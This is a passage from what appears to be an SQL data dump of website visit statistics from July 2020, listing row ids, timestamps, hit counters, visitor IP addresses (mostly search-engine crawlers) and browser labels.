49.64.33','chrome'),(525795,1595665657,2,2,0,0,'66.249.70.72','chrome'),(525796,1595665788,2,2,0,0,'66.249.70.69','chrome'),(525797,1595665933,1,1,0,0,'66.249.70.70','chrome'),(525798,1595666244,8,8,0,0,'185.11.82.228','other'),(525799,1595667035,1,0,1,0,'66.249.70.69',''),(525800,1595667250,2,2,0,0,'66.249.70.72','chrome'),(525801,1595667258,6,6,0,0,'66.249.70.69','chrome'),(525802,1595667394,1,1,0,0,'66.249.64.38','chrome'),(525803,1595667460,8,8,0,0,'185.11.82.228','other'),(525804,1595667608,2,2,0,0,'66.249.70.70','chrome'),(525805,1595668233,1,1,0,0,'40.117.209.114','other'),(525806,1595668374,2,2,0,0,'66.249.64.36','chrome'),(525807,1595668483,2,2,0,0,'66.249.70.72','chrome'),(525808,1595668545,1,1,0,0,'66.249.70.70','chrome'),(525809,1595668665,8,8,0,0,'185.11.82.228','other'),(525810,1595669201,5,5,0,0,'66.249.70.69','chrome'),(525811,1595669411,1,1,0,0,'66.249.70.72','chrome'),(525812,1595669821,1,1,0,0,'93.78.198.126','chrome'),(525813,1595669907,8,8,0,0,'185.11.82.228','other'),(525814,1595670047,1,1,0,0,'94.130.9.183','other'),(525815,1595670251,3,3,0,0,'66.249.70.70','chrome'),(525816,1595670523,2,2,0,0,'207.46.13.139','other'),(525817,1595670934,6,6,0,0,'66.249.70.69','chrome'),(525818,1595671115,1,1,0,0,'91.196.178.10','chrome'),(525819,1595671145,8,8,0,0,'185.11.82.228','other'),(525820,1595671257,2,2,0,0,'66.249.70.70','chrome'),(525821,1595671463,1,1,0,0,'66.249.70.72','chrome'),(525822,1595672131,1,1,0,0,'157.55.39.208','other'),(525823,1595672225,1,1,0,0,'66.249.64.33','chrome'),(525824,1595672400,2,2,0,0,'207.46.13.139','other'),(525825,1595672554,8,8,0,0,'185.11.82.228','other'),(525826,1595672872,1,1,0,0,'66.249.70.72','chrome'),(525827,1595673200,2,2,0,0,'66.249.70.70','chrome'),(525828,1595673270,1,1,0,0,'66.249.70.69','chrome'),(525829,1595673760,4,4,0,0,'207.46.13.139','other'),(525830,1595673775,4,4,0,0,'157.55.39.208','other'),(525831,1595673857,1,1,0,0,'207.46.13.174','other'),(525832,1595674044,8,8,0,0,'185.11.82.228','other'),(525833,1595674092,1,1,0,0,'8.29.198.27','other'),(525834,1595674556,1,1,0,0,'66.249.70.70','chrome'),(525835,1595674679,1,1,0,0,'66.249.70.69','chrome'),(525836,1595675002,1,1,0,0,'109.74.154.72','chrome'),(525837,1595675045,1,1,0,0,'8.29.198.25','other'),(525838,1595675240,1,1,0,0,'91.209.11.236','other'),(525839,1595675475,1,1,0,0,'66.249.70.72','chrome'),(525840,1595675559,8,8,0,0,'185.11.82.228','other'),(525841,1595675702,1,1,0,0,'207.46.13.139','other'),(525842,1595676066,2,2,0,0,'66.249.70.70','chrome'),(525843,1595676067,1,1,0,0,'157.55.39.208','other'),(525844,1595676531,1,1,0,0,'66.249.70.72','chrome'),(525845,1595676892,2,2,0,0,'66.249.70.69','chrome'),(525846,1595677088,8,8,0,0,'185.11.82.228','other'),(525847,1595677436,2,2,0,0,'66.249.70.72','chrome'),(525848,1595677522,2,2,0,0,'157.55.39.208','other'),(525849,1595677636,1,1,0,0,'66.249.70.70','chrome'),(525850,1595678271,3,3,0,0,'66.249.70.69','chrome'),(525851,1595678521,3,3,0,0,'66.249.70.72','chrome'),(525852,1595678664,8,8,0,0,'185.11.82.228','other'),(525853,1595678990,3,3,0,0,'157.55.39.208','other'),(525854,1595680143,1,1,0,0,'66.249.70.72','chrome'),(525855,1595680259,8,8,0,0,'185.11.82.228','other'),(525856,1595680319,4,4,0,0,'66.249.70.69','chrome'),(525857,1595680575,1,1,0,0,'66.249.70.70','chrome'),(525858,1595680907,1,1,0,0,'207.46.13.139','other'),(525859,1595681640,3,3,0,0,'66.249.70.69','chrome'),(525860,1595681850,1,1,0,0,'66.249.64.36','chrome'),(525861,1595681861,8,8,0,0,'185.11.82.228','other'),(525862,1595681902,1,1,0,0,'66.249.70.72','chrome'),(525863,1595682033,2,2,0,0,'66.249.70.70','chrome'),(525864,1595682101,1,1,0,0,'31.13.127.118','chrome'),(525865,1595682408,1,1,0,0,'213.180.203.16','other'),(525866,1595682452,2,2,0,0,'207.46.13.62','other'),(525867,1595683516,8,8,0,0,'185.11.82.228','other'),(525868,1595683718,1,1,0,0,'207.46.13.139','other'),(525869,1595684081,3,3,0,0,'157.55.39.208','other'),(525870,1595684247,1,1,0,0,'66.249.70.70','chrome'),(525871,1595684256,3,3,0,0,'66.249.70.69','chrome'),(525872,1595684922,1,1,0,0,'8.29.198.26','other'),(525873,1595685155,8,8,0,0,'185.11.82.228','other'),(525874,1595685640,2,2,0,0,'66.249.70.70','chrome'),(525875,1595685872,1,1,0,0,'8.29.198.25','other'),(525876,1595686764,8,8,0,0,'185.11.82.228','other'),(525877,1595687165,1,1,0,0,'207.46.13.139','other'),(525878,1595687276,1,1,0,0,'157.55.39.208','other'),(525879,1595688111,1,1,0,0,'178.154.200.220','other'),(525880,1595688115,1,1,0,0,'66.249.70.69','chrome'),(525881,1595688172,2,2,0,0,'207.46.13.139','other'),(525882,1595688368,8,8,0,0,'185.11.82.228','other'),(525883,1595688954,1,1,0,0,'157.55.39.208','other'),(525884,1595689522,1,1,0,0,'91.196.178.186','chrome'),(525885,1595690011,8,8,0,0,'185.11.82.228','other'),(525886,1595690107,2,2,0,0,'157.55.39.208','other'),(525887,1595690204,1,1,0,0,'178.154.200.222','other'),(525888,1595690532,2,2,0,0,'207.46.13.139','other'),(525889,1595691114,1,1,0,0,'157.55.39.208','other'),(525890,1595691318,2,2,0,0,'66.249.70.72','chrome'),(525891,1595691593,8,8,0,0,'185.11.82.228','other'),(525892,1595691659,3,3,0,0,'66.249.70.69','chrome'),(525893,1595691843,1,1,0,0,'66.249.64.33','chrome'),(525894,1595693199,8,8,0,0,'185.11.82.228','other'),(525895,1595693527,1,1,0,0,'66.249.70.72','chrome'),(525896,1595693531,1,1,0,0,'66.249.70.70','chrome'),(525897,1595693553,2,2,0,0,'66.249.70.69','chrome'),(525898,1595694058,1,1,0,0,'94.180.140.162','chrome'),(525899,1595694117,1,1,0,0,'66.249.64.38','chrome'),(525900,1595694478,1,1,0,0,'157.55.39.208','other'),(525901,1595694873,8,8,0,0,'185.11.82.228','other'),(525902,1595695316,3,2,1,0,'66.249.70.72',''),(525903,1595695386,3,3,0,0,'66.249.70.70','chrome'),(525904,1595695413,2,2,0,0,'66.249.70.69','chrome'),(525905,1595695702,1,1,0,0,'91.196.178.10','chrome'),(525906,1595695744,1,1,0,0,'8.29.198.26','other'),(525907,1595696497,8,8,0,0,'185.11.82.228','other'),(525908,1595696558,1,1,0,0,'157.55.39.208','other'),(525909,1595696703,1,1,0,0,'8.29.198.27','other'),(525910,1595697215,1,1,0,0,'66.249.70.72','chrome'),(525911,1595697224,1,1,0,0,'66.249.70.70','chrome'),(525912,1595697281,2,2,0,0,'66.249.70.69','chrome'),(525913,1595698213,3,3,0,0,'66.249.70.70','chrome'),(525914,1595698353,2,2,0,0,'66.249.70.69','chrome'),(525915,1595698816,2,2,0,0,'66.249.70.72','chrome'),(525916,1595698921,1,1,0,0,'66.249.64.33','chrome'),(525917,1595699015,1,1,0,0,'157.55.39.208','other'),(525918,1595699071,8,8,0,0,'185.11.82.228','other'),(525919,1595699805,1,1,0,0,'66.249.70.69','chrome'),(525920,1595699840,2,2,0,0,'66.249.70.70','chrome'),(525921,1595700011,1,1,0,0,'66.249.70.72','chrome'),(525922,1595700672,1,1,0,0,'157.55.39.208','other'),(525923,1595701511,1,1,0,0,'66.249.70.72','chrome'),(525924,1595701643,5,5,0,0,'66.249.70.70','chrome'),(525925,1595701896,1,1,0,0,'178.154.200.222','other'),(525926,1595702051,8,8,0,0,'185.11.82.228','other'),(525927,1595702247,1,1,0,0,'66.249.64.38','chrome'),(525928,1595702896,1,1,0,0,'157.55.39.208','other'),(525929,1595703196,1,1,0,0,'66.249.70.72','chrome'),(525930,1595703213,1,1,0,0,'66.249.70.70','chrome'),(525931,1595703563,1,1,0,0,'66.249.70.69','chrome'),(525932,1595703833,1,1,0,0,'165.22.34.222','firefox'),(525933,1595704119,2,2,0,0,'66.249.70.70','chrome'),(525934,1595704753,1,1,0,0,'66.249.70.72','chrome'),(525935,1595704917,8,8,0,0,'185.11.82.228','other'),(525936,1595704942,1,1,0,0,'157.55.39.208','other'),(525937,1595705541,5,5,0,0,'66.249.70.70','chrome'),(525938,1595705558,2,2,0,0,'66.249.70.69','chrome'),(525939,1595705628,1,1,0,0,'173.252.111.11','other'),(525940,1595706421,2,2,0,0,'66.249.70.72','chrome'),(525941,1595706448,1,1,0,0,'66.249.64.33','chrome'),(525942,1595706487,1,1,0,0,'66.249.70.70','chrome'),(525943,1595706568,1,1,0,0,'8.29.198.25','other'),(525944,1595706770,4,4,0,0,'66.249.70.69','chrome'),(525945,1595707528,1,1,0,0,'8.29.198.25','other'),(525946,1595707790,2,2,0,0,'66.249.70.72','chrome'),(525947,1595707954,8,8,0,0,'185.11.82.228','other'),(525948,1595708210,1,1,0,0,'66.249.64.38','chrome'),(525949,1595708516,3,3,0,0,'66.249.70.70','chrome'),(525950,1595708717,1,1,0,0,'157.55.39.208','other'),(525951,1595708971,1,1,0,0,'66.249.70.72','chrome'),(525952,1595710615,2,2,0,0,'66.249.70.72','chrome'),(525953,1595710638,1,1,0,0,'66.249.64.38','chrome'),(525954,1595710702,1,1,0,0,'178.154.200.222','other'),(525955,1595710707,1,1,0,0,'91.196.178.84','chrome'),(525956,1595710886,8,8,0,0,'185.11.82.228','other'),(525957,1595711176,3,3,0,0,'66.249.70.70','chrome'),(525958,1595711847,1,1,0,0,'213.180.203.16','other'),(525959,1595711974,1,1,0,0,'178.154.200.222','other'),(525960,1595711995,1,1,0,0,'157.55.39.108','other'),(525961,1595712244,1,1,0,0,'66.249.70.69','chrome'),(525962,1595712305,2,2,0,0,'66.249.70.72','chrome'),(525963,1595712471,2,2,0,0,'66.249.64.38','chrome'),(525964,1595713027,1,1,0,0,'66.249.70.70','chrome'),(525965,1595713534,1,1,0,0,'66.249.64.33','chrome'),(525966,1595713585,1,1,0,0,'157.55.39.208','other'),(525967,1595713787,2,2,0,0,'207.46.13.247','other'),(525968,1595714002,8,8,0,0,'185.11.82.228','other'),(525969,1595714029,1,1,0,0,'5.45.207.118','other'),(525970,1595714052,1,1,0,0,'88.155.24.158','chrome'),(525971,1595714064,2,2,0,0,'66.249.70.72','chrome'),(525972,1595714247,4,4,0,0,'66.249.70.70','chrome'),(525973,1595714510,1,1,0,0,'66.249.64.36','chrome'),(525974,1595714597,1,1,0,0,'91.196.178.83','chrome'),(525975,1595714608,1,1,0,0,'157.55.39.208','other'),(525976,1595714845,1,1,0,0,'157.55.39.108','other'),(525977,1595714869,1,1,0,0,'66.249.64.33','chrome'),(525978,1595715525,1,1,0,0,'66.249.70.70','chrome'),(525979,1595716063,2,2,0,0,'66.249.64.33','chrome'),(525980,1595716374,1,1,0,0,'66.249.70.69','chrome'),(525981,1595716470,1,1,0,0,'66.249.70.72','chrome'),(525982,1595717039,8,8,0,0,'185.11.82.228','other'),(525983,1595717170,1,1,0,0,'157.55.39.252','other'),(525984,1595717394,1,1,0,0,'8.29.198.25','other'),(525985,1595717944,1,1,0,0,'66.249.70.70','chrome'),(525986,1595717953,2,2,0,0,'66.249.70.69','chrome'),(525987,1595718207,1,1,0,0,'66.249.70.72','chrome'),(525988,1595718354,1,1,0,0,'8.29.198.26','other'),(525989,1595718842,1,1,0,0,'157.55.39.208','other'),(525990,1595718959,1,1,0,0,'207.46.13.247','other'),(525991,1595719333,1,0,1,0,'66.249.70.72',''),(525992,1595719524,2,2,0,0,'66.249.70.69','chrome'),(525993,1595719699,1,1,0,0,'66.249.64.33','chrome'),(525994,1595719843,1,1,0,0,'66.249.70.72','chrome'),(525995,1595720049,2,2,0,0,'66.249.70.70','chrome'),(525996,1595720123,1,1,0,0,'107.174.226.244','chrome'),(525997,1595720135,8,8,0,0,'185.11.82.228','other'),(525998,1595720140,1,1,0,0,'23.81.230.206','chrome'),(525999,1595720380,1,1,0,0,'92.113.188.255','chrome'),(526000,1595720994,2,2,0,0,'66.249.70.72','chrome'),(526001,1595721307,1,1,0,0,'62.205.134.182','other'),(526002,1595721524,1,1,0,0,'3.129.6.94','chrome'),(526003,1595721537,1,1,0,0,'157.55.39.208','other'),(526004,1595721563,1,1,0,0,'66.249.70.70','chrome'),(526005,1595721589,2,2,0,0,'66.249.70.69','chrome'),(526006,1595722206,2,2,0,0,'66.249.70.72','chrome'),(526007,1595722220,1,1,0,0,'207.46.13.247','other'),(526008,1595723208,1,1,0,0,'66.249.70.69','chrome'),(526009,1595723376,8,8,0,0,'185.11.82.228','other'),(526010,1595724778,1,1,0,0,'66.249.70.69','chrome'),(526011,1595724848,4,4,0,0,'66.249.70.72','chrome'),(526012,1595724975,3,3,0,0,'66.249.70.70','chrome'),(526013,1595726734,3,3,0,0,'66.249.70.72','chrome'),(526014,1595726736,8,8,0,0,'185.11.82.228','other'),(526015,1595727174,4,4,0,0,'66.249.70.70','chrome'),(526016,1595727561,1,1,0,0,'66.249.70.69','chrome'),(526017,1595727767,1,1,0,0,'157.55.39.208','other'),(526018,1595728218,1,1,0,0,'8.29.198.26','other'),(526019,1595728571,1,1,0,0,'66.249.70.69','chrome'),(526020,1595728773,1,1,0,0,'66.249.70.70','chrome'),(526021,1595729022,1,1,0,0,'157.55.39.208','other'),(526022,1595729175,1,1,0,0,'8.29.198.25','other'),(526023,1595729701,4,4,0,0,'66.249.70.72','chrome'),(526024,1595730020,1,1,0,0,'178.154.200.222','other'),(526025,1595730343,6,6,0,0,'66.249.70.69','chrome'),(526026,1595730494,8,8,0,0,'185.11.82.228','other'),(526027,1595730566,3,3,0,0,'66.249.64.36','chrome'),(526028,1595730702,2,2,0,0,'66.249.70.72','chrome'),(526029,1595730842,1,1,0,0,'66.249.70.70','chrome'),(526030,1595730856,1,1,0,0,'66.249.64.38','chrome'),(526031,1595731713,2,2,0,0,'66.249.70.69','chrome'),(526032,1595732562,2,2,0,0,'66.249.70.70','chrome'),(526033,1595732763,1,1,0,0,'66.249.64.38','chrome'),(526034,1595732824,2,2,0,0,'66.249.70.69','chrome'),(526035,1595732889,1,1,0,0,'66.249.70.72','chrome'),(526036,1595734025,2,2,0,0,'52.32.105.198','other'),(526037,1595734176,3,3,0,0,'66.249.70.72','chrome'),(526038,1595734368,8,8,0,0,'185.11.82.228','other'),(526039,1595734705,2,2,0,0,'66.249.70.69','chrome'),(526040,1595734790,1,1,0,0,'157.55.39.108','other'),(526041,1595735126,1,1,0,0,'66.249.64.33','chrome'),(526042,1595735419,3,3,0,0,'66.249.70.72','chrome'),(526043,1595735440,2,2,0,0,'66.249.70.70','chrome'),(526044,1595736180,1,1,0,0,'66.249.64.38','chrome'),(526045,1595736434,1,1,0,0,'69.64.93.101','chrome'),(526046,1595736464,1,1,0,0,'66.249.70.70','chrome'),(526047,1595737558,1,1,0,0,'186.233.144.213','chrome'),(526048,1595737606,1,1,0,0,'66.249.64.36','chrome'),(526049,1595737610,1,1,0,0,'66.249.70.72','chrome'),(526050,1595737786,1,1,0,0,'66.249.70.70','chrome'),(526051,1595737869,1,1,0,0,'131.220.6.152','chrome'),(526052,1595738475,1,1,0,0,'207.46.13.247','other'),(526053,1595738534,8,8,0,0,'185.11.82.228','other'),(526054,1595738739,1,1,0,0,'66.249.70.70','chrome'),(526055,1595739040,1,1,0,0,'8.29.198.25','other'),(526056,1595739046,1,1,0,0,'5.61.250.112','chrome'),(526057,1595739067,2,2,0,0,'94.199.60.207','chrome'),(526058,1595739176,1,1,0,0,'62.205.134.182','other'),(526059,1595739191,1,1,0,0,'66.249.64.38','chrome'),(526060,1595739487,3,3,0,0,'66.249.70.72','chrome'),(526061,1595739676,8,8,0,0,'185.11.82.228','other'),(526062,1595739697,2,2,0,0,'66.249.70.69','chrome'),(526063,1595739702,3,3,0,0,'66.249.70.70','chrome'),(526064,1595739999,1,1,0,0,'8.29.198.26','other'),(526065,1595740313,1,1,0,0,'81.88.49.9','chrome'),(526066,1595740320,1,1,0,0,'81.88.49.14','chrome'),(526067,1595740490,1,1,0,0,'207.46.13.247','other'),(526068,1595740863,8,8,0,0,'185.11.82.228','other'),(526069,1595741146,1,1,0,0,'17.58.99.84','other'),(526070,1595741180,1,1,0,0,'95.163.36.18','other'),(526071,1595741237,3,3,0,0,'66.249.70.69','chrome'),(526072,1595741299,2,2,0,0,'66.249.70.72','chrome'),(526073,1595741750,1,1,0,0,'178.154.200.222','other'),(526074,1595741785,1,1,0,0,'157.55.39.208','other'),(526075,1595741942,2,2,0,0,'91.208.99.2','chrome'),(526076,1595742184,8,8,0,0,'185.11.82.228','other'),(526077,1595742287,1,1,0,0,'91.196.178.58','chrome'),(526078,1595743168,1,1,0,0,'66.249.70.72','chrome'),(526079,1595743346,8,8,0,0,'185.11.82.228','other'),(526080,1595743580,1,1,0,0,'51.68.11.215','chrome'),(526081,1595743649,1,1,0,0,'66.249.64.36','chrome'),(526082,1595744116,1,1,0,0,'66.249.64.33','chrome'),(526083,1595744177,2,2,0,0,'66.249.70.69','chrome'),(526084,1595744283,1,1,0,0,'66.249.64.38','chrome'),(526085,1595744521,8,8,0,0,'185.11.82.228','other'),(526086,1595744618,2,2,0,0,'27.254.140.71','chrome'),(526087,1595744689,2,2,0,0,'136.243.178.154','chrome'),(526088,1595744782,1,1,0,0,'213.180.203.16','other'),(526089,1595745188,1,1,0,0,'66.249.70.72','chrome'),(526090,1595745272,1,1,0,0,'66.249.64.36','chrome'),(526091,1595745582,1,1,0,0,'182.22.27.21','other'),(526092,1595745684,8,8,0,0,'185.11.82.228','other'),(526093,1595746076,1,1,0,0,'66.249.70.69','chrome'),(526094,1595746120,1,1,0,0,'66.249.70.72','chrome'),(526095,1595746711,2,2,0,0,'66.249.64.33','chrome'),(526096,1595746733,3,3,0,0,'66.249.70.70','chrome'),(526097,1595746751,1,1,0,0,'17.58.99.84','other'),(526098,1595746892,8,8,0,0,'185.11.82.228','other'),(526099,1595747168,1,1,0,0,'178.154.200.222','other'),(526100,1595747651,5,5,0,0,'66.249.70.69','chrome'),(526101,1595747997,1,1,0,0,'207.46.13.247','other'),(526102,1595748104,8,8,0,0,'185.11.82.228','other'),(526103,1595748580,1,1,0,0,'115.146.122.250','chrome'),(526104,1595748793,2,2,0,0,'66.249.70.69','chrome'),(526105,1595749371,8,8,0,0,'185.11.82.228','other'),(526106,1595749374,2,2,0,0,'107.174.241.135','chrome'),(526107,1595749459,1,1,0,0,'31.22.7.58','chrome'),(526108,1595749617,1,1,0,0,'51.68.11.215','chrome'),(526109,1595749663,1,1,0,0,'178.154.200.220','other'),(526110,1595749881,1,1,0,0,'8.29.198.27','other'),(526111,1595750338,2,2,0,0,'66.249.70.69','chrome'),(526112,1595750395,4,4,0,0,'66.249.70.70','chrome'),(526113,1595750398,2,2,0,0,'207.46.13.247','other'),(526114,1595750508,1,1,0,0,'66.249.64.38','chrome'),(526115,1595750628,8,8,0,0,'185.11.82.228','other'),(526116,1595750701,3,3,0,0,'66.249.70.72','chrome'),(526117,1595750716,1,1,0,0,'160.153.154.159','chrome'),(526118,1595750767,1,1,0,0,'51.68.11.207','chrome'),(526119,1595750827,1,1,0,0,'8.29.198.26','other'),(526120,1595751734,3,3,0,0,'66.249.70.70','chrome'),(526121,1595751875,8,8,0,0,'185.11.82.228','other'),(526122,1595751879,3,3,0,0,'66.249.70.69','chrome'),(526123,1595751943,1,1,0,0,'66.249.64.36','chrome'),(526124,1595752009,1,1,0,0,'66.249.64.33','chrome'),(526125,1595752148,2,2,0,0,'87.236.20.169','chrome'),(526126,1595752648,1,1,0,0,'66.249.70.72','chrome'),(526127,1595752710,1,1,0,0,'178.154.200.222','other'),(526128,1595753117,8,8,0,0,'185.11.82.228','other'),(526129,1595753225,1,1,0,0,'66.249.70.70','chrome'),(526130,1595753230,3,3,0,0,'66.249.70.69','chrome'),(526131,1595753965,2,2,0,0,'188.166.218.146','chrome'),(526132,1595753987,4,4,0,0,'66.249.64.33','chrome'),(526133,1595754070,3,3,0,0,'66.249.70.72','chrome'),(526134,1595754188,1,1,0,0,'66.249.70.70','chrome'),(526135,1595754192,1,1,0,0,'66.249.70.69','chrome'),(526136,1595754380,8,8,0,0,'185.11.82.228','other'),(526137,1595754473,1,1,0,0,'31.177.95.69','chrome'),(526138,1595755017,2,2,0,0,'50.62.161.240','chrome'),(526139,1595755058,2,2,0,0,'207.46.13.247','other'),(526140,1595755067,1,1,0,0,'157.55.39.208','other'),(526141,1595755085,2,2,0,0,'157.55.39.108','other'),(526142,1595755479,2,2,0,0,'66.249.70.72','chrome'),(526143,1595755597,6,6,0,0,'66.249.70.70','chrome'),(526144,1595755650,8,8,0,0,'185.11.82.228','other'),(526145,1595755706,4,4,0,0,'66.249.70.69','chrome'),(526146,1595756133,2,2,0,0,'157.55.39.208','other'),(526147,1595756739,1,0,1,0,'66.249.70.69',''),(526148,1595756929,1,1,0,0,'185.49.20.75','chrome'),(526149,1595756934,8,8,0,0,'185.11.82.228','other'),(526150,1595757255,1,1,0,0,'77.245.149.11','chrome'),(526151,1595757311,1,1,0,0,'42.112.30.118','chrome'),(526152,1595757723,1,1,0,0,'66.249.64.33','chrome'),(526153,1595757950,1,1,0,0,'66.249.70.69','chrome'),(526154,1595758230,8,8,0,0,'185.11.82.228','other'),(526155,1595758239,2,2,0,0,'66.249.70.72','chrome'),(526156,1595758375,1,1,0,0,'66.249.70.70','chrome'),(526157,1595758770,1,1,0,0,'157.55.39.108','other'),(526158,1595759272,1,1,0,0,'66.249.70.72','chrome'),(526159,1595759307,4,4,0,0,'66.249.70.69','chrome'),(526160,1595759442,1,1,0,0,'66.249.64.33','chrome'),(526161,1595759477,8,8,0,0,'185.11.82.228','other'),(526162,1595759640,1,1,0,0,'66.249.70.70','chrome'),(526163,1595760707,1,1,0,0,'8.29.198.26','other'),(526164,1595760740,8,8,0,0,'185.11.82.228','other'),(526165,1595761175,1,1,0,0,'109.74.154.72','chrome'),(526166,1595761282,2,2,0,0,'66.249.70.72','chrome'),(526167,1595761656,1,1,0,0,'8.29.198.26','other'),(526168,1595761831,3,3,0,0,'66.249.70.70','chrome'),(526169,1595761847,1,1,0,0,'157.55.39.208','other'),(526170,1595761965,1,1,0,0,'178.92.72.135','chrome'),(526171,1595762030,8,8,0,0,'185.11.82.228','other'),(526172,1595762653,2,2,0,0,'66.249.70.72','chrome'),(526173,1595762661,5,5,0,0,'66.249.70.69','chrome'),(526174,1595762840,2,2,0,0,'66.249.70.70','chrome'),(526175,1595763079,1,1,0,0,'66.249.64.36','chrome'),(526176,1595763315,8,8,0,0,'185.11.82.228','other'),(526177,1595763531,2,2,0,0,'66.249.64.33','chrome'),(526178,1595763829,3,3,0,0,'66.249.70.72','chrome'),(526179,1595764179,1,1,0,0,'66.249.70.70','chrome'),(526180,1595764271,1,1,0,0,'66.249.64.38','chrome'),(526181,1595764351,1,1,0,0,'66.249.64.36','chrome'),(526182,1595764594,8,8,0,0,'185.11.82.228','other'),(526183,1595764640,1,1,0,0,'66.249.70.69','chrome'),(526184,1595764675,3,3,0,0,'157.55.39.208','other'),(526185,1595765720,1,1,0,0,'66.249.70.69','chrome'),(526186,1595765769,1,1,0,0,'66.249.64.36','chrome'),(526187,1595765886,8,8,0,0,'185.11.82.228','other'),(526188,1595765920,2,2,0,0,'66.249.70.70','chrome'),(526189,1595765940,1,1,0,0,'17.58.99.84','other'),(526190,1595767133,8,8,0,0,'185.11.82.228','other'),(526191,1595767519,1,1,0,0,'178.154.200.216','other'),(526192,1595768170,2,2,0,0,'66.249.70.70','chrome'),(526193,1595768420,8,8,0,0,'185.11.82.228','other'),(526194,1595769033,2,1,1,0,'66.249.70.69',''),(526195,1595769156,3,3,0,0,'66.249.70.70','chrome'),(526196,1595769693,8,8,0,0,'185.11.82.228','other'),(526197,1595769739,2,2,0,0,'207.46.13.247','other'),(526198,1595769824,5,5,0,0,'66.249.70.69','chrome'),(526199,1595770289,2,2,0,0,'66.249.70.70','chrome'),(526200,1595770786,3,3,0,0,'66.249.70.72','chrome'),(526201,1595770793,7,7,0,0,'66.249.70.69','chrome'),(526202,1595771024,8,8,0,0,'185.11.82.228','other'),(526203,1595771234,7,7,0,0,'66.249.70.70','chrome'),(526204,1595771531,1,1,0,0,'8.29.198.25','other'),(526205,1595771807,5,5,0,0,'66.249.70.69','chrome'),(526206,1595771915,3,3,0,0,'66.249.70.72','chrome'),(526207,1595772233,2,2,0,0,'66.249.70.70','chrome'),(526208,1595772356,8,8,0,0,'185.11.82.228','other'),(526209,1595772478,1,1,0,0,'8.29.198.25','other'),(526210,1595772595,1,1,0,0,'66.249.64.38','chrome'),(526211,1595772997,1,0,1,0,'66.249.70.72',''),(526212,1595773150,1,1,0,0,'157.55.39.208','other'),(526213,1595773206,3,3,0,0,'66.249.70.69','chrome'),(526214,1595773298,3,3,0,0,'66.249.70.70','chrome'),(526215,1595773685,8,8,0,0,'185.11.82.228','other'),(526216,1595773767,1,1,0,0,'66.249.64.36','chrome'),(526217,1595774467,2,2,0,0,'66.249.70.69','chrome'),(526218,1595775003,8,8,0,0,'185.11.82.228','other'),(526219,1595775011,2,2,0,0,'66.249.70.72','chrome'),(526220,1595775016,4,4,0,0,'66.249.70.70','chrome'),(526221,1595775999,1,1,0,0,'66.249.64.36','chrome'),(526222,1595776058,1,1,0,0,'66.249.70.69','chrome'),(526223,1595776333,8,8,0,0,'185.11.82.228','other'),(526224,1595776566,1,1,0,0,'178.154.200.222','other'),(526225,1595776953,1,1,0,0,'66.249.64.38','chrome'),(526226,1595777000,2,2,0,0,'66.249.70.72','chrome'),(526227,1595777171,1,1,0,0,'157.55.39.208','other'),(526228,1595777458,1,1,0,0,'178.154.200.220','other'),(526229,1595777637,8,8,0,0,'185.11.82.228','other'),(526230,1595777707,1,1,0,0,'207.46.13.247','other'),(526231,1595777827,3,3,0,0,'66.249.70.69','chrome'),(526232,1595778619,2,2,0,0,'66.249.70.70','chrome'),(526233,1595778856,2,2,0,0,'66.249.70.72','chrome'),(526234,1595778946,8,8,0,0,'185.11.82.228','other'),(526235,1595779522,2,2,0,0,'66.249.70.69','chrome'),(526236,1595779651,2,2,0,0,'66.249.70.70','chrome'),(526237,1595779813,1,1,0,0,'79.165.21.253','chrome'),(526238,1595779817,1,1,0,0,'188.168.60.13','chrome'),(526239,1595780264,2,2,0,0,'66.249.64.33','chrome'),(526240,1595780268,3,3,0,0,'66.249.70.72','chrome'),(526241,1595780283,8,8,0,0,'185.11.82.228','other'),(526242,1595780506,3,3,0,0,'66.249.70.69','chrome'),(526243,1595780776,3,3,0,0,'66.249.70.70','chrome'),(526244,1595781210,3,3,0,0,'66.249.70.72','chrome'),(526245,1595781610,8,8,0,0,'185.11.82.228','other'),(526246,1595781620,1,1,0,0,'157.55.39.208','other'),(526247,1595782096,1,1,0,0,'66.249.70.70','chrome'),(526248,1595782099,3,3,0,0,'207.46.13.77','other'),(526249,1595782291,1,1,0,0,'66.249.64.36','chrome'),(526250,1595782356,1,1,0,0,'8.29.198.25','other'),(526251,1595782954,8,8,0,0,'185.11.82.228','other'),(526252,1595783134,2,2,0,0,'66.249.64.38','chrome'),(526253,1595783299,2,2,0,0,'157.55.39.208','other'),(526254,1595783304,1,1,0,0,'8.29.198.26','other'),(526255,1595783647,2,2,0,0,'66.249.70.72','chrome'),(526256,1595783666,1,1,0,0,'66.249.70.70','chrome'),(526257,1595783980,2,2,0,0,'66.249.70.69','chrome'),(526258,1595784280,8,8,0,0,'185.11.82.228','other'),(526259,1595784442,1,1,0,0,'157.55.39.208','other'),(526260,1595785600,8,8,0,0,'185.11.82.228','other'),(526261,1595785996,3,3,0,0,'66.249.70.69','chrome'),(526262,1595786035,1,1,0,0,'66.249.64.33','chrome'),(526263,1595786333,2,2,0,0,'66.249.70.72','chrome'),(526264,1595786524,1,1,0,0,'66.249.70.70','chrome'),(526265,1595786950,8,8,0,0,'185.11.82.228','other'),(526266,1595787589,3,3,0,0,'66.249.70.69','chrome'),(526267,1595787633,1,1,0,0,'66.249.70.72','chrome'),(526268,1595787725,2,2,0,0,'66.249.70.70','chrome'),(526269,1595788285,8,8,0,0,'185.11.82.228','other'),(526270,1595789375,1,1,0,0,'66.249.70.72','chrome'),(526271,1595789497,1,1,0,0,'66.249.70.70','chrome'),(526272,1595789627,8,8,0,0,'185.11.82.228','other'),(526273,1595790317,1,1,0,0,'66.249.64.38','chrome'),(526274,1595790424,1,1,0,0,'45.133.222.2','other'),(526275,1595790611,2,2,0,0,'66.249.70.69','chrome'),(526276,1595790978,8,8,0,0,'185.11.82.228','other'),(526277,1595791310,3,3,0,0,'66.249.70.72','chrome'),(526278,1595791604,1,1,0,0,'66.249.64.38','chrome'),(526279,1595791616,1,1,0,0,'66.249.70.70','chrome'),(526280,1595791624,1,1,0,0,'66.249.70.69','chrome'),(526281,1595792028,1,1,0,0,'157.55.39.53','other'),(526282,1595792319,8,8,0,0,'185.11.82.228','other'),(526283,1595793051,1,1,0,0,'66.249.70.70','chrome'),(526284,1595793146,2,2,0,0,'93.74.253.78','chrome'),(526285,1595793178,1,1,0,0,'8.29.198.27','other'),(526286,1595793329,1,1,0,0,'66.249.70.69','chrome'),(526287,1595793640,8,8,0,0,'185.11.82.228','other'),(526288,1595793852,1,1,0,0,'178.154.200.222','other'),(526289,1595794021,1,1,0,0,'66.249.64.38','chrome'),(526290,1595794122,1,1,0,0,'8.29.198.27','other'),(526291,1595794682,1,1,0,0,'188